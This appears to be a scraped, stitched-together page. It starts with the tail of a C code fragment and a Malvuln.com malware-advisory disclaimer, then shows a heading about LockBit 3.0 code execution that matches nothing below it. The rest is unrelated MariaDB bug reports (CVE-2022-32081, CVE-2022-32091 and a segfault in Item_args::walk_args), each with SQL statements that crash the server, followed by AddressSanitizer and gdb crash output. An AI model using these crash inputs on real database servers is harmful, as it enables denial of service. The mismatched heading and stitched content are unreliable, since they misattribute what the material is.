TerminateProcess(handle, 0);       CloseHandle(handle);     }   }    break;  }  return TRUE;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Ransom Lockbit 3.0 MVID-2022-0621 Code Execution

MariaDB v10.4 to v10.7 was discovered to contain an use-after-poison in prepare_inplace_add_virtual at /storage/innobase/handler/handler0alter.cc.

CREATE TABLE v0 ( v1 TIME NOT NULL PRIMARY KEY ) ;

 ALTER TABLE v0 ADD COLUMN v0 INT GENERATED ALWAYS AS ( lpad ( 'x' , NULL = 32 , 'x' ) ) STORED ;

 SHOW LOCAL STATUS WHERE COALESCE ( 27 , 51 - 39 ) = 'x' ;

 DELETE FROM v0 WHERE 44707452.000000 ;

 ALTER TABLE v0 ADD COLUMN v0 INT GENERATED ALWAYS AS ( v1 + v1 ) , DROP COLUMN v0 ;

 SELECT COUNT ( \* ) FROM v0 WHERE v1 = -128 AND v1 = 'x' ;

2021-08-16 14:41:38 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:41:38 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:41:38 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:41:38 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:41:38 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:41:38 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:41:38 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:41:38 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:41:38 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:41:38 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42161; transaction id 14

2021-08-16 14:41:38 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:38 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:41:38 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:41:38

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:41:38 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:41:38 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/0.socket'  port: 3306  Source distribution

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld (initiated by: root\[root\] @ localhost \[\]): Normal shutdown

2021-08-16 14:41:39 0 \[Note\] InnoDB: FTS optimize thread exiting.

2021-08-16 14:41:39 0 \[Note\] InnoDB: Starting shutdown...

2021-08-16 14:41:39 0 \[Note\] InnoDB: Dumping buffer pool(s) to /home/fuboat/mariadb-tmp/mysql-default-data/ib\_buffer\_pool

2021-08-16 14:41:39 0 \[Note\] InnoDB: Buffer pool(s) dump completed at 210816 14:41:39

2021-08-16 14:41:39 0 \[Note\] InnoDB: Removed temporary tablespace data file: "./ibtmp1"

2021-08-16 14:41:39 0 \[Note\] InnoDB: Shutdown completed; log sequence number 42173; transaction id 15

2021-08-16 14:41:39 0 \[Note\] /usr/local/mysql/bin//mysqld: Shutdown complete

2021-08-16 14:49:19 0 \[Note\] InnoDB: Compressed tables use zlib 1.2.11

2021-08-16 14:49:19 0 \[Note\] InnoDB: Number of pools: 1

2021-08-16 14:49:19 0 \[Note\] InnoDB: Using crc32 + pclmulqdq instructions

2021-08-16 14:49:19 0 \[Note\] mysqld: O\_TMPFILE is not supported on /tmp (disabling future attempts)

2021-08-16 14:49:19 0 \[Note\] InnoDB: Using liburing

2021-08-16 14:49:19 0 \[Note\] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728

2021-08-16 14:49:19 0 \[Note\] InnoDB: Completed initialization of buffer pool

2021-08-16 14:49:26 0 \[Note\] InnoDB: 128 rollback segments are active.

2021-08-16 14:49:26 0 \[Note\] InnoDB: Creating shared tablespace for temporary tables

2021-08-16 14:49:26 0 \[Note\] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...

2021-08-16 14:49:26 0 \[Note\] InnoDB: File './ibtmp1' size is now 12 MB.

2021-08-16 14:49:26 0 \[Note\] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14

2021-08-16 14:49:26 0 \[Note\] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/19/ib\_buffer\_pool

2021-08-16 14:49:26 0 \[Note\] Plugin 'FEEDBACK' is disabled.

2021-08-16 14:49:27 0 \[Note\] Server socket created on IP: '0.0.0.0'.

2021-08-16 14:49:27 0 \[Note\] Server socket created on IP: '::'.

2021-08-16 14:49:28 0 \[Note\] InnoDB: Buffer pool(s) load completed at 210816 14:49:28

2021-08-16 14:49:28 0 \[Note\] /usr/local/mysql/bin//mysqld: ready for connections.

Version: '10.7.0-MariaDB'  socket: '/tmp/19.socket'  port: 10019  Source distribution

\=================================================================

\==2119277==ERROR: AddressSanitizer: use-after-poison on address 0x6190000d6d60 at pc 0x55a3184baacf bp 0x7f47ed829920 sp 0x7f47ed829910

WRITE of size 64 at 0x6190000d6d60 thread T14

    #0 0x55a3184baace in prepare\_inplace\_add\_virtual /experiment/mariadb-server/sql/field.h:1395

    #1 0x55a3184cc1db in prepare\_inplace\_alter\_table\_dict /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:6206

    #2 0x55a3184d9f06 in ha\_innobase::prepare\_inplace\_alter\_table(TABLE\*, Alter\_inplace\_info\*) /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:8270

    #3 0x55a3176a67d2 in mysql\_inplace\_alter\_table /experiment/mariadb-server/sql/sql\_table.cc:7326

    #4 0x55a3176a67d2 in mysql\_alter\_table(THD\*, st\_mysql\_const\_lex\_string const\*, st\_mysql\_const\_lex\_string const\*, HA\_CREATE\_INFO\*, TABLE\_LIST\*, Alter\_info\*, unsigned int, st\_order\*, bool, bool) /experiment/mariadb-server/sql/sql\_table.cc:10205

    #5 0x55a3177fcf99 in Sql\_cmd\_alter\_table::execute(THD\*) /experiment/mariadb-server/sql/sql\_alter.cc:550

    #6 0x55a31741717f in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:5997

    #7 0x55a3174245a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #8 0x55a31742a60b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #9 0x55a31742f73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #10 0x55a3177eae56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #11 0x55a3177eb33c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #12 0x55a31827bc2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #13 0x7f4812443258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

    #14 0x7f4811fee5e2 in \_\_GI\_\_\_clone (/usr/lib/libc.so.6+0xfe5e2)

0x6190000d6d60 is located 480 bytes inside of 1152-byte region \[0x6190000d6b80,0x6190000d7000)

allocated by thread T14 here:

    #0 0x7f4812ad5279 in \_\_interceptor\_malloc /build/gcc/src/gcc/libsanitizer/asan/asan\_malloc\_linux.cpp:145

    #1 0x55a3185c76c0 in ut\_allocator<unsigned char, true>::allocate(unsigned long, unsigned char const\*, unsigned int, bool, bool) /experiment/mariadb-server/storage/innobase/include/ut0new.h:375

    #2 0x55a3185c76c0 in mem\_heap\_create\_block\_func(mem\_block\_info\_t\*, unsigned long, unsigned long) /experiment/mariadb-server/storage/innobase/mem/mem0mem.cc:277

    #3 0x55a3184da801 in mem\_heap\_create\_func /experiment/mariadb-server/storage/innobase/include/mem0mem.ic:377

    #4 0x55a3184da801 in ha\_innobase::prepare\_inplace\_alter\_table(TABLE\*, Alter\_inplace\_info\*) /experiment/mariadb-server/storage/innobase/handler/handler0alter.cc:7816

    #5 0x55a3176a67d2 in mysql\_inplace\_alter\_table /experiment/mariadb-server/sql/sql\_table.cc:7326

    #6 0x55a3176a67d2 in mysql\_alter\_table(THD\*, st\_mysql\_const\_lex\_string const\*, st\_mysql\_const\_lex\_string const\*, HA\_CREATE\_INFO\*, TABLE\_LIST\*, Alter\_info\*, unsigned int, st\_order\*, bool, bool) /experiment/mariadb-server/sql/sql\_table.cc:10205

    #7 0x55a3177fcf99 in Sql\_cmd\_alter\_table::execute(THD\*) /experiment/mariadb-server/sql/sql\_alter.cc:550

    #8 0x55a31741717f in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:5997

    #9 0x55a3174245a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #10 0x55a31742a60b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #11 0x55a31742f73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #12 0x55a3177eae56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #13 0x55a3177eb33c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #14 0x55a31827bc2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #15 0x7f4812443258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

Thread T14 created by T0 here:

    #0 0x7f4812a76fa7 in \_\_interceptor\_pthread\_create /build/gcc/src/gcc/libsanitizer/asan/asan\_interceptors.cpp:216

    #1 0x55a31827bea9 in my\_thread\_create /experiment/mariadb-server/storage/perfschema/my\_thread.h:48

    #2 0x55a31827bea9 in pfs\_spawn\_thread\_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252

    #3 0x55a3170ecb3c in inline\_mysql\_thread\_create /experiment/mariadb-server/include/mysql/psi/mysql\_thread.h:1139

    #4 0x55a3170ecb3c in create\_thread\_to\_handle\_connection(CONNECT\*) /experiment/mariadb-server/sql/mysqld.cc:5934

    #5 0x55a3170f87b6 in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /experiment/mariadb-server/sql/mysqld.cc:6055

    #6 0x55a3170f936f in handle\_connections\_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179

    #7 0x55a3170fca52 in mysqld\_main(int, char\*\*) /experiment/mariadb-server/sql/mysqld.cc:5829

    #8 0x7f4811f17b24 in \_\_libc\_start\_main (/usr/lib/libc.so.6+0x27b24)

SUMMARY: AddressSanitizer: use-after-poison /experiment/mariadb-server/sql/field.h:1395 in prepare\_inplace\_add\_virtual

Shadow bytes around the buggy address:

  0x0c3280012d50: f7 f7 fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c3280012d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

  0x0c3280012d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c3280012d80: f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c3280012d90: 00 00 00 00 00 00 f7 00 00 00 00 00 00 00 00 00

\=>0x0c3280012da0: 00 00 00 00 00 00 00 00 00 00 00 f7\[f7\]f7 f7 f7

  0x0c3280012db0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012dc0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012dd0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012de0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c3280012df0: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

Shadow byte legend (one shadow byte represents 8 application bytes):

  Addressable:           00

  Partially addressable: 01 02 03 04 05 06 07 

  Heap left redzone:       fa

  Freed heap region:       fd

  Stack left redzone:      f1

  Stack mid redzone:       f2

  Stack right redzone:     f3

  Stack after return:      f5

  Stack use after scope:   f8

  Global redzone:          f9

  Global init order:       f6

  Poisoned by user:        f7

  Container overflow:      fc

  Array cookie:            ac

  Intra object redzone:    bb

  ASan internal:           fe

  Left alloca redzone:     ca

  Right alloca redzone:    cb

  Shadow gap:              cc

\==2119277==ABORTING

GNU gdb (GDB) 10.2

Copyright (C) 2021 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.

Type "show copying" and "show warranty" for details.

This GDB was configured as "x86\_64-pc-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<https://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from /usr/local/mysql/bin//mysqld...

(gdb) (gdb) (gdb) quit

CVE-2022-32081: [MDEV-26420] use-after-poison in Storage - Jira

MariaDB v10.7 was discovered to contain an use-after-poison in in __interceptor_memset at /libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc.

CREATE TABLE v0 ( v2 BIGINT , v1 BIGINT ) ENGINE = MEMORY ROW\_FORMAT = COMPRESSED AS SELECT 59218101.000000 AS v3 UNION SELECT FALSE ;

 START TRANSACTION ;

 SELECT instr ( v1 , DES\_ENCRYPT ( 'x' REGEXP 'x' , 'x' ) ) BETWEEN v3 AND -1 FROM v0 ;

 SELECT DISTINCT v2 IN ( COLLATION ( AVG ( 'x' ) ) + -128 , 'x' , 'x' ) FROM v0 WHERE v2 IS NOT NULL ;

 UPDATE v0 SET v2 = v3 + 69 ;

 INSERT INTO v0 ( ) SELECT v1 , v1 FROM v0 ;

\=================================================================

\==2933067==ERROR: AddressSanitizer: use-after-poison on address 0x6290000a6080 at pc 0x7fb1687ce7b7 bp 0x7fb1435a5730 sp 0x7fb1435a4ed8

WRITE of size 944 at 0x6290000a6080 thread T14

    #0 0x7fb1687ce7b6 in \_\_interceptor\_memset /build/gcc/src/gcc/libsanitizer/sanitizer\_common/sanitizer\_common\_interceptors.inc:799

    #1 0x55c6bfcc41e9 in JOIN::make\_aggr\_tables\_info() /experiment/mariadb-server/sql/sql\_select.cc:3694

    #2 0x55c6bfcf2e71 in JOIN::optimize\_stage2() /experiment/mariadb-server/sql/sql\_select.cc:3225

    #3 0x55c6bfcfcd06 in JOIN::optimize\_inner() /experiment/mariadb-server/sql/sql\_select.cc:2479

    #4 0x55c6bfcfe7b0 in JOIN::optimize() /experiment/mariadb-server/sql/sql\_select.cc:1809

    #5 0x55c6bfcfea0d in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /experiment/mariadb-server/sql/sql\_select.cc:4977

    #6 0x55c6bfd00654 in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /experiment/mariadb-server/sql/sql\_select.cc:545

    #7 0x55c6bfb43d7c in execute\_sqlcom\_select /experiment/mariadb-server/sql/sql\_parse.cc:6256

    #8 0x55c6bfb6d420 in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:3946

    #9 0x55c6bfb725a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #10 0x55c6bfb7860b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #11 0x55c6bfb7d73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #12 0x55c6bff38e56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #13 0x55c6bff3933c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #14 0x55c6c09c9c2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #15 0x7fb1681ba258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

    #16 0x7fb167d655e2 in \_\_GI\_\_\_clone (/usr/lib/libc.so.6+0xfe5e2)

0x6290000a6080 is located 3712 bytes inside of 16400-byte region \[0x6290000a5200,0x6290000a9210)

allocated by thread T14 here:

    #0 0x7fb16884c279 in \_\_interceptor\_malloc /build/gcc/src/gcc/libsanitizer/asan/asan\_malloc\_linux.cpp:145

    #1 0x55c6c12fc9a8 in my\_malloc /experiment/mariadb-server/mysys/my\_malloc.c:90

    #2 0x55c6c12e9414 in alloc\_root /experiment/mariadb-server/mysys/my\_alloc.c:332

    #3 0x55c6bfc3d047 in Query\_arena::alloc(unsigned long) /experiment/mariadb-server/sql/sql\_class.h:1206

    #4 0x55c6bfc3d047 in update\_ref\_and\_keys /experiment/mariadb-server/sql/sql\_select.cc:7110

    #5 0x55c6bfce537e in make\_join\_statistics /experiment/mariadb-server/sql/sql\_select.cc:5377

    #6 0x55c6bfcfc73b in JOIN::optimize\_inner() /experiment/mariadb-server/sql/sql\_select.cc:2453

    #7 0x55c6bfcfe7b0 in JOIN::optimize() /experiment/mariadb-server/sql/sql\_select.cc:1809

    #8 0x55c6bfcfea0d in mysql\_select(THD\*, TABLE\_LIST\*, List<Item>&, Item\*, unsigned int, st\_order\*, st\_order\*, Item\*, st\_order\*, unsigned long long, select\_result\*, st\_select\_lex\_unit\*, st\_select\_lex\*) /experiment/mariadb-server/sql/sql\_select.cc:4977

    #9 0x55c6bfd00654 in handle\_select(THD\*, LEX\*, select\_result\*, unsigned long) /experiment/mariadb-server/sql/sql\_select.cc:545

    #10 0x55c6bfb43d7c in execute\_sqlcom\_select /experiment/mariadb-server/sql/sql\_parse.cc:6256

    #11 0x55c6bfb6d420 in mysql\_execute\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:3946

    #12 0x55c6bfb725a0 in mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*) /experiment/mariadb-server/sql/sql\_parse.cc:8030

    #13 0x55c6bfb7860b in dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1896

    #14 0x55c6bfb7d73c in do\_command(THD\*, bool) /experiment/mariadb-server/sql/sql\_parse.cc:1404

    #15 0x55c6bff38e56 in do\_handle\_one\_connection(CONNECT\*, bool) /experiment/mariadb-server/sql/sql\_connect.cc:1418

    #16 0x55c6bff3933c in handle\_one\_connection /experiment/mariadb-server/sql/sql\_connect.cc:1312

    #17 0x55c6c09c9c2b in pfs\_spawn\_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

    #18 0x7fb1681ba258 in start\_thread (/usr/lib/libpthread.so.0+0x9258)

Thread T14 created by T0 here:

    #0 0x7fb1687edfa7 in \_\_interceptor\_pthread\_create /build/gcc/src/gcc/libsanitizer/asan/asan\_interceptors.cpp:216

    #1 0x55c6c09c9ea9 in my\_thread\_create /experiment/mariadb-server/storage/perfschema/my\_thread.h:48

    #2 0x55c6c09c9ea9 in pfs\_spawn\_thread\_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252

    #3 0x55c6bf83ab3c in inline\_mysql\_thread\_create /experiment/mariadb-server/include/mysql/psi/mysql\_thread.h:1139

    #4 0x55c6bf83ab3c in create\_thread\_to\_handle\_connection(CONNECT\*) /experiment/mariadb-server/sql/mysqld.cc:5934

    #5 0x55c6bf8467b6 in handle\_accepted\_socket(st\_mysql\_socket, st\_mysql\_socket) /experiment/mariadb-server/sql/mysqld.cc:6055

    #6 0x55c6bf84736f in handle\_connections\_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179

    #7 0x55c6bf84aa52 in mysqld\_main(int, char\*\*) /experiment/mariadb-server/sql/mysqld.cc:5829

    #8 0x7fb167c8eb24 in \_\_libc\_start\_main (/usr/lib/libc.so.6+0x27b24)

SUMMARY: AddressSanitizer: use-after-poison /build/gcc/src/gcc/libsanitizer/sanitizer\_common/sanitizer\_common\_interceptors.inc:799 in \_\_interceptor\_memset

Shadow bytes around the buggy address:

  0x0c528000cbc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cbd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cbe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cbf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cc00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

\=>0x0c528000cc10:\[f7\]00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cc20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  0x0c528000cc30: 00 00 00 00 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c528000cc40: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c528000cc50: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

  0x0c528000cc60: f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7 f7

Shadow byte legend (one shadow byte represents 8 application bytes):

  Addressable:           00

  Partially addressable: 01 02 03 04 05 06 07 

  Heap left redzone:       fa

  Freed heap region:       fd

  Stack left redzone:      f1

  Stack mid redzone:       f2

  Stack right redzone:     f3

  Stack after return:      f5

  Stack use after scope:   f8

  Global redzone:          f9

  Global init order:       f6

  Poisoned by user:        f7

  Container overflow:      fc

  Array cookie:            ac

  Intra object redzone:    bb

  ASan internal:           fe

  Left alloca redzone:     ca

  Right alloca redzone:    cb

  Shadow gap:              cc

\==2933067==ABORTING

CVE-2022-32091: [MDEV-26431] MariaDB Server use-after-poison - Jira

MariaDB v10.2 to v10.7 was discovered to contain a segmentation fault via the component Item_args::walk_args.

CREATE TABLE v0 ( v2 INT NOT NULL , v1 BIGINT AS ( CASE 'x' WHEN CURRENT\_USER ( ) THEN v2 END ) ) ;

 SELECT v2 AS v3 FROM v0 WHERE v1 LIKE 'x' ESCAPE 'x' ;

 INSERT INTO v0 VALUES ( -128 , NULL , NULL , NULL , NULL , TO\_DATE ( 'x' , 'x' ) ) ;

Server version: 10.7.0-MariaDB

key\_buffer\_size=134217728

read\_buffer\_size=131072

max\_used\_connections=1

max\_threads=153

thread\_count=1

It is possible that mysqld could use up to 

key\_buffer\_size + (read\_buffer\_size + sort\_buffer\_size)\*max\_threads = 467956 K  bytes of memory

Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x62b0000bd218

Attempting backtrace. You can use the following information to find out

where mysqld died. If you see no messages after this, something went

terribly wrong...

stack\_bottom = 0x7f9fca453850 thread\_stack 0x5fc00

sanitizer\_common/sanitizer\_common\_interceptors.inc:4203(\_\_interceptor\_backtrace.part.0)\[0x7f9fe9cffc3e\]

mysys/stacktrace.c:213(my\_print\_stacktrace)\[0x556139072747\]

sql/signal\_handler.cc:222(handle\_fatal\_signal)\[0x55613803a120\]

sigaction.c:0(\_\_restore\_rt)\[0x7f9fe96e9870\]

:0(\_\_GI\_raise)\[0x7f9fe91c8d22\]

:0(\_\_GI\_abort)\[0x7f9fe91b2862\]

libsupc++/vterminate.cc:75(\_\_gnu\_cxx::\_\_verbose\_terminate\_handler())\[0x7f9fe9552802\]

libsupc++/eh\_terminate.cc:48(\_\_cxxabiv1::\_\_terminate(void (\*)()))\[0x7f9fe955ec8a\]

??:0(std::terminate())\[0x7f9fe955ecf7\]

??:0(\_\_cxa\_pure\_virtual)\[0x7f9fe955fa75\]

sql/item.cc:1121(Item::check\_type\_scalar(st\_mysql\_const\_lex\_string const&) const)\[0x5561380a4308\]

sql/item\_func.cc:271(Item\_func::check\_argument\_types\_scalar(unsigned int, unsigned int) const)\[0x5561381e2a5b\]

sql/item\_func.cc:357(Item\_func::fix\_fields(THD\*, Item\*\*))\[0x5561381ce34e\]

sql/item\_cmpfunc.cc:3131(Item\_func\_case::fix\_fields(THD\*, Item\*\*))\[0x556138100700\]

sql/table.cc:3590(fix\_vcol\_expr(THD\*, Virtual\_column\_info\*))\[0x556137be6ee2\]

sql/sql\_base.cc:5429(TABLE::fix\_vcol\_exprs(THD\*))\[0x55613775e1ca\]

sql/sql\_base.cc:5467(lock\_tables(THD\*, TABLE\_LIST\*, unsigned int, unsigned int))\[0x55613775ef93\]

sql/sql\_base.cc:5261(open\_and\_lock\_tables(THD\*, DDL\_options\_st const&, TABLE\_LIST\*, bool, unsigned int, Prelocking\_strategy\*))\[0x556137763800\]

sql/sql\_base.h:397(open\_and\_lock\_tables(THD\*, TABLE\_LIST\*, bool, unsigned int))\[0x556137819ef4\]

sql/sql\_parse.cc:4565(mysql\_execute\_command(THD\*, bool))\[0x5561378d2bb8\]

sql/sql\_parse.cc:8047(mysql\_parse(THD\*, char\*, unsigned int, Parser\_state\*))\[0x5561378df5a1\]

sql/sql\_parse.cc:1898(dispatch\_command(enum\_server\_command, THD\*, char\*, unsigned int, bool))\[0x5561378e560c\]

sql/sql\_parse.cc:1406(do\_command(THD\*, bool))\[0x5561378ea73d\]

sql/sql\_connect.cc:1418(do\_handle\_one\_connection(CONNECT\*, bool))\[0x556137ca5e57\]

sql/sql\_connect.cc:1312(handle\_one\_connection)\[0x556137ca633d\]

perfschema/pfs.cc:2204(pfs\_spawn\_thread)\[0x556138736c2c\]

pthread\_create.c:0(start\_thread)\[0x7f9fe96df259\]

:0(\_\_GI\_\_\_clone)\[0x7f9fe928a5e3\]

Trying to get some variables.

Some pointers may be invalid and cause the dump to abort.

Query (0x629000087238): INSERT INTO v0 VALUES ( -128 , NULL , NULL , NULL , NULL , TO\_DATE ( 'x' , 'x' ) )

Connection ID (thread ID): 4

Status: NOT\_KILLED

Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/5

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units     

Max cpu time              unlimited            unlimited            seconds   

Max file size             unlimited            unlimited            bytes     

Max data size             unlimited            unlimited            bytes     

Max stack size            8388608              unlimited            bytes     

Max core file size        unlimited            unlimited            bytes     

Max resident set          unlimited            unlimited            bytes     

Max processes             61608                61608                processes 

Max open files            524288               524288               files     

Max locked memory         65536                65536                bytes     

Max address space         unlimited            unlimited            bytes     

Max file locks            unlimited            unlimited            locks     

Max pending signals       61608                61608                signals   

Max msgqueue size         819200               819200               bytes     

Max nice priority         0                    0                    

Max realtime priority     0                    0                    

Max realtime timeout      unlimited            unlimited            us        

Core pattern: core

Using host libthread\_db library "/usr/lib/libthread\_db.so.1".

Core was generated by \`/usr/local/mysql/bin//mysqld --port 10005 --datadir=/home/fuboat/mariadb-tmp/5'.

Program terminated with signal SIGABRT, Aborted.

#0  0x00007f9fe96e6808 in pthread\_kill () from /usr/lib/libpthread.so.0

#1  0x000055613803a06b in handle\_fatal\_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal\_handler.cc:344

#2  <signal handler called>

#3  0x00007f9fe91c8d22 in raise () from /usr/lib/libc.so.6

#4  0x00007f9fe91b2862 in abort () from /usr/lib/libc.so.6

#5  0x00007f9fe9552802 in \_\_gnu\_cxx::\_\_verbose\_terminate\_handler () at /build/gcc/src/gcc/libstdc++-v3/libsupc++/vterminate.cc:95

